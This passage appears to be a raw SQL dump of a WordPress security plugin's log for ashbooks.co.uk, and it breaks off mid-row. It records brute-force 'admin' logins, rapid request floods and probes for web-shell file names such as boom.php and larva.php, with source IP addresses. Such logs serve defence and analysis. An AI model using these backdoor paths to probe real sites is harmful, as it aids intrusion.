fLYrN','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216213.8251,18,'vPpF9WbXV2UtmruRzSydQCnq','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216215.0635,18,'xXmqdl0rSO78oEaLQsFNKBGT','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216216.7880,18,'Iq7afoQj6lzTbwhZuEL5g8iY','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216218.2073,18,'U0KbT284PmEIsiSqWwCnJxRg','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216219.6395,18,'4grcE07YkyGKLNeZbhsdnzJH','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216220.7850,18,'QDCWP37Sz46eaqgbMEhUkw21','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216221.9688,18,'G6lDQLwFBHhTo48iYOetE9I2','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216223.3593,18,'zGpZnNK96SW5bVYTau84B7tv','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216224.8256,18,'BAX7d8G5PnvafIZbC1OTrtgp','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216226.0791,18,'YuojNHAx2svLnlSywtEQzW1I','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216227.7529,18,'WYga3IvV9NBsck1rUzwiTCl4','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216228.8763,18,'roBFdeA27PsK9tVU4Y6Q08NE','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216230.4930,18,'mxJpQbU6837gLC9KZsVlTOzD','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216231.8421,18,'lnvYDGZJ3tmENgWrUfFweac9','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216233.4085,18,'dErCIKGwvm7ocu1UjHSgk3bp','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216235.1266,18,'EziDS2KjkF90waAbIJXoQqMT','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('41.225.212.115',702665843,'admin',0,1637216235.1524,7,'zPyTeaf6JvXBQmKNptYirZOo','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('141.98.83.79',2372031311,'',0,1637216237.0458,18,'DyYrU3WSHKzmQuGhLFdR6nXg','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216238.1246,18,'g4GmSsqoJ8jHViNtf9OrIvaC','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('41.225.212.115',702665843,'admin',0,1637216238.8896,7,'sewSyhPpAYNJk6xmqVlCz59t','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('141.98.83.79',2372031311,'',0,1637216239.1228,18,'HdVFC1IDOnxy3NtmLRjJbla2','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216240.5755,18,'FA6QyHINZvUgdSMWrkVD7tJE','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('41.225.212.115',702665843,'admin',0,1637216242.2045,7,'TWA01YoBJiOLvh7mMr3x9nj8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('141.98.83.79',2372031311,'',0,1637216242.2767,18,'f6EPphDb14avx5igYs8e2jUL','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216243.5554,18,'nBU8IHFwz7evA4qypJDlhNtC','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216244.9874,18,'qjlJhiAHQVSzFweBsd5NCkaP','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('41.225.212.115',702665843,'admin',0,1637216245.9806,7,'GS2Q3DKIbgX7k0tB9Lj6cHmx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('141.98.83.79',2372031311,'',0,1637216246.3804,18,'BlQ2wMI4h7yZ0sbEYTkjrNX3','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216247.7540,18,'zZpakG4UQt6OdJqHyAPX0lgx','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216249.4593,18,'P5jQc2HpJaKADO7iBeX3NCzx','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('41.225.212.115',702665843,'admin',0,1637216249.6061,7,'Fy1ZkhSmK53o7ab0RnQdB9fY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('41.225.212.115',702665843,'',0,1637216249.6317,10,'Fy1ZkhSmK53o7ab0RnQdB9fY','','701|0|0|0|ashbooks.co.uk/wp-login.php'),('141.98.83.79',2372031311,'',0,1637216252.0645,18,'YdW5EN4meAT8F1fgLsbin7Pk','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('41.225.212.115',702665843,'',0,1637216252.4212,50,'0VJbZNmqfnXFld5pPOI7EkRh','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('141.98.83.79',2372031311,'',0,1637216253.7243,18,'SfmAp7s1oTcHV5QdniuGK6a8','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216254.8806,18,'n5H1PWJK7I9DgrupRysSXvZt','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216256.7717,18,'DVGQTUtNfO8Z9npsw75lgWkz','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216258.3987,18,'DC5RTjLx04Akm2u3OJecEXQh','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216259.8591,18,'RpyWLUa89w0EK5viQFhJD32V','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216261.1424,18,'sqxIu56t3GEnTBvJczFyW14U','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216262.0276,18,'CRIKHQohx1PTMep0Zb4FWzSn','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216263.3536,18,'p01nZ6CTU3Bbemuqor2GcK5h','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216264.8794,18,'ay3ZPUQ18TvL7cFe0grOkRio','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216265.9975,18,'jCFKXW37vYu6hmq105ryodJA','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216267.0936,18,'tKuOMYjs7bDwVqPmLlHa4gRT','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216268.3254,18,'AZvwVu9g7sKmbLfFizQIJ4rU','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216270.0373,18,'0w9bcUJEq2jVIvkA7dH3C1Ze','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216273.3766,18,'AjY3bMdHLN5zWiXmqIvrVZ70','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216274.6094,18,'AXWSkIyuOKlUef7opNw1Virv','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216276.1479,18,'r9upoaODmnxvsG6N8ZlVy7ET','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216277.5360,18,'b5OWamVkKcfX6tSuIiHsReTN','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216278.9450,18,'QqxRU9kebwdOD1mWiMrJ6zPA','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216280.6963,18,'oJNnAgrc2DTK8eF5qzhMS9BL','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216281.8510,18,'1v2hAuae04CRzn3qliFPI7Xc','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216283.1504,18,'RBoFTNdML8EH6Y1pf4bZqzu2','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216284.7972,18,'dRHQ46ye25rkj9gptbK0hDmV','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216286.4421,18,'NL7f4v261A0r95boZjdwcmaT','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216287.6756,18,'vxkcdIgXor8SCQquZzmB6fHb','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216289.2323,18,'V1EGImpRPrJ0oi9bByXYwT8g','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216290.4336,18,'avEmeQhAfJS3yM4glsxtB6n1','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216291.8367,18,'Fqx7GmKorAZYuzTslHUctXv2','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216293.4798,18,'NzFlARESK1Uvq0tOGMe6kTh2','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216295.0004,18,'jTD4NnEFtypJmvQuXBIcqz5b','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216296.0836,18,'QoaksZJzbHcltCFV0fWjP6uX','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216297.8721,18,'7Znl8AuIXxY0iwUEqoamOLGj','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216299.0522,18,'M0JXGxPUSLQlqBHZra4Wg8tR','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216300.6623,18,'92b8MI4BulU3KTPwRamy0gpY','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216302.0836,18,'kXsfpBdtCIogyEiHYcO1lanu','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216303.4922,18,'dwWYnLUGtyeTrxO29i4JMqCH','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216305.1071,18,'BxvRws5LzUV0DfuHXmZWerkc','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216306.7403,18,'KmSGLO2bZpBT60eCJlw1nkdV','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216308.0688,18,'tKNE9ZWVSaQhUTo5iAslCbxk','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216309.3820,18,'YhbCSGf1X7mP9il2acZdp03s','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216310.8537,18,'Jwu3FG8izmHxdOXK4BrCstYT','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216312.1630,18,'q5TJVNYRb3sp8K9ntgLhjF2Q','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216313.4966,18,'Qt8wyZkqEucOpFGriMTdvYf4','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216316.4094,18,'nIyxBQdswVOa3LqAzMHeFPG1','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216317.9238,18,'bTt1ryw60qmsJpLcX7zZNaPD','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216319.1575,18,'Nv0JiYd4pKmyW2gE1CPhe5Gf','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216320.7443,18,'gkGK5IalmcxToVHewUM6CQzO','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216322.3985,18,'9tLafw47nHylmvoKceDUG51E','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216323.8283,18,'mpCNrbTeRjyHDIk45P8YEUG7','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216325.4051,18,'PWpANC7J8OMVHsQKi4ZBh0Ix','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216327.4528,18,'WFw8Xi0BGmgPlpYvHC5EZft4','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216328.9640,18,'6YBU9w84GjXbrfOWcL0hkHAv','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216330.3709,18,'sGbEt7n6ZTulDF2U0agBoVdh','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216332.2062,18,'Uz3jKGh5din9IQJfZyBqY8gR','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216333.8804,18,'zoKTXMGbsRmJ5uaneOWxdjtf','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216335.3229,18,'HS924jnwVeOYXMNsKI3rEJAl','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216336.8836,18,'CuhTXyFdEt9RYBZbjAaxil5K','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216338.5632,18,'0zTfv8MOG7k6Il1AoK4hFZ3j','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216340.0861,18,'I7ZwlB92hva4mc1eYyTsCJqp','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216341.7199,18,'5CtoRTxK0Lu3QzNf97MUODv1','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216343.0770,18,'EMI0znwL4B3kabhm9FDvCTZx','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216344.6325,18,'NgGEXU9A3VxlwL7npSD6fBRc','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216346.0287,18,'wi1TEeW5aY2q7f9IDovlu3MS','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216347.1410,18,'iXhscjCaotA108eyRZNLMPFO','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216348.5530,18,'Cai6ElKO03PG5ReobA4TfuzS','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216350.1006,18,'FrxLHUMOdVyR2mEYgfoJA37p','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216351.4639,18,'GPsQMFurw3VkHZmIe4TEpoRA','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216353.1560,18,'R5ngZEziJMkKLVQljI3DAXsS','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216354.7510,18,'8ECbcs0xlFWkwP1aRLoX6v93','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216356.6802,18,'XWP2qDmni3T45hwzEK0Sl8Lu','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216358.0317,18,'RH1ou8Gh9g0ObI5DapSK3syJ','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216359.5990,18,'vaVO5nEy9R8NAf1XhImdQs20','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216360.9383,18,'F6KapTg5Vh3keCdUwS4Q9jmE','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216362.4809,18,'Rv79xAr1WmHKZsSGhMqkdjzw','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216364.1379,18,'WYlBzvKi8aXZ9VA07wuOjbLd','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216365.8643,18,'gz1XIjUJNtT0Vmsbu7pdKAWh','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216367.4333,18,'EWwoeck6i5TqlmDpn1BGHONb','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216368.6561,18,'YRMbJZXdC2p5TEaxmkciUnV0','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216370.0077,18,'TnJXsvjAcG7mIokYl3EUMKgC','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216371.3083,18,'Jh8N7iG5yXpLq31YBaO6gfEV','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216372.6050,18,'7a9AY2KRtBvrbJL1UzoyOn4g','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216373.8298,18,'7q8pDIeQ0w14NOJyUXrKum2t','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216375.0814,18,'Ny2YugjUXm40dQ7aocGeHbAO','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216376.4756,18,'85RFZL49zcfCblYXgAEDm6tU','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216378.0392,18,'Oufj8I7Aa6SeqyoQvYtF2WxV','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216379.4920,18,'tsKZjXncRT7hICDqarQku5E4','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216380.8428,18,'BjoFWlGHa63KPgC2v74R1YiT','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216382.1522,18,'brId58MJeCvG7FH03BVlNQOw','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216383.3673,18,'EIdBZl5GMqQ7t3cL6bU4CehS','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216384.9512,18,'ARc94PtXsjbhaQ81roxDKiOB','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216386.4410,18,'mvjh02NTuOedAMqSPgia3VJC','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216388.1164,18,'69di7SPtrh2ocs15bwJfOXxz','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216389.6168,18,'kH6X8oEfuqnYB3Ozl4Zb15aU','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216391.3199,18,'2rZBYXu64RAfU7lK1i89HvDj','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216393.5096,18,'keXA307TaVLB1ftlmPJbwEHn','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216395.1144,18,'Qc8xrYpIRPZsqO2oh1ABwDk6','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216396.4796,18,'m0QOiWJqxDYodjk3nwagcuph','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216397.6879,18,'NFtzse7Z2l0aEYvHoqWw5yu3','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216399.2669,18,'Kabe1QFlokOqBHS8DfzLN9jX','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216400.8952,18,'qIuR9FgJrxkEzw627ZaLnD4W','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216402.1412,18,'pUGyf5CALsxkg2Xc9Z6DROdz','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216403.6512,18,'3BEY16ASF7hDGQb0xcCtRsLM','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216404.8824,18,'SKDpli97sHCMObgGJEerThcV','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216406.4685,18,'O5Tmd3qw6CxtDpHyUAhN9noa','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216408.0430,18,'cb9ULjdxYA4uvMDHtIawzgli','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216409.6446,18,'Q1ySh02keaiUFGHmBAEj7V8L','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216411.0443,18,'usQModZORK1V0h23IjN8tfqB','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216412.4970,18,'n2R8AeOYxQkEmuFDJ3dz1I7i','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216413.9866,18,'zlw1X3EKskqB59yUaHTdhV7Y','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216415.0831,18,'gS4lmVW29v7pxNTXQouPdh5w','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216416.7239,18,'I4G8kAxDLjOvB0lMwo6E57hZ','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216418.0495,18,'tOpdacqJC6uL75s4VUDSrRze','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216419.6007,18,'KcYp27DuahAdW3z5fZJg0V1L','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216421.0174,18,'nh7TmW1IB4FcAZ2Pjdvpyq8V','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216422.6870,18,'0AjEhgKtJHaIPTUo9ZQ7b852','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216424.1650,18,'OJQvWSPmY0cZAV1d8rjD6L5I','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216425.8381,18,'I6y7qvROXQMwHlauBz8Ax24g','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216427.4971,18,'eYsR8Kgo14cZHhAjqNltmiTu','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216428.9374,18,'2RgnH1tDm6KYdTr8wMBCzeSZ','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216430.1874,18,'JHcTiw8t0mvCEopWYIZnfyQM','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216431.6003,18,'DYuflbTQ1j2zHKJPmUpLgFWB','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216433.1044,18,'CKp7VqPj6OSBE1ltLHR3o90m','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216434.3916,18,'mQd5EwftGU21cX9OCSy0JiWk','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216435.7049,18,'utWTdJESxF4k9GIKCzV5o6A8','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216437.3264,18,'02etZQGTDExK6MSks4cqz8mw','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216438.8215,18,'Jz3SrH1YPQMfuDpFVGxTlNZC','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216441.0600,18,'kIKt4JRWVla6oQrLbPS9GOi0','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216442.6932,18,'Y7SEkLIc50pFyXjKV4OiDP1m','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216444.1089,18,'jlNp5JbaBUDoh7eQzZMY6u2f','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216445.6979,18,'XjPpv2SuZYrQOs1i7q9JCbEc','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('95.217.144.72',1608093768,'admin',0,1637216811.4820,7,'2HZVbXuQi9e6x5K7OYmgkI1R','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('208.113.160.8',3497107464,'admin',0,1637218333.8865,7,'KjCfehXkwl2s8YAcyTpnB7ZJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1637218635.6418,55,'ZYvlhaE23WLPmDtK5f6pMnoe','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/akismet/class.akismet-https.php'),('41.225.212.115',702665843,'',0,1637219810.7176,50,'XUnWlIJT8g0jbqxOcH7dwvGi','','13|0|0|0|ashbooks.co.uk//wp-login.php'),('103.121.89.72',1736005960,'admin',0,1637219934.5424,7,'q8O2wUFM76LgxE5nJsb4HWIY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('66.11.120.48',1108047920,'admin',0,1637221500.7672,7,'LCcdE0i8b7xT45fwPueDVOKS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.240.28',1159655452,'ashbooks',0,1637221971.4587,51,'Ure1BPZVfIFatNcsSJzToWEk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('87.106.169.145',1466608017,'admin',0,1637223021.2836,7,'ErlQYtoehLbG54dknH0iwqyg','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.131.88',1920435032,'',0,1637224167.0596,55,'sQY6bSKmND14jxwIyGOTU38n','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('162.55.85.219',2721535451,'',0,1637225842.4941,55,'eYhSoIwXOL6y7gNpJQuV382v','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('40.69.131.238',675644398,'',0,1637226811.3096,55,'he5DtAzl3yIEFf14nibd69ZC','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637226814.6879,55,'vkb8aKQjNG62Opy7oisf5ZhY','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637226816.8972,55,'S8TNYPCK9J4UVQdp1jheDF3t','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637226820.8271,55,'dkHylRFSvg5wDOzBnAQxU3eC','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637226827.6547,55,'Prb28scdUE03OK7HwvoDAGIF','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637226827.6970,10,'Prb28scdUE03OK7HwvoDAGIF','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637226829.2991,55,'2NPxklntIiqecoYygFJrdvjB','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637226831.5904,55,'a5MS2DxEwXVnK9cUPlQfO1j4','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637226833.9957,100,'aq46HwWAfoYdcTpyBIb7Zxjz','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637226839.8080,100,'hutwsjGF6RvqMIJZy7mT5df0','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637226843.1937,100,'aMkd0LxEQ7KjyAbuRTFWtSr3','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637226844.4933,100,'oZLRUGvPH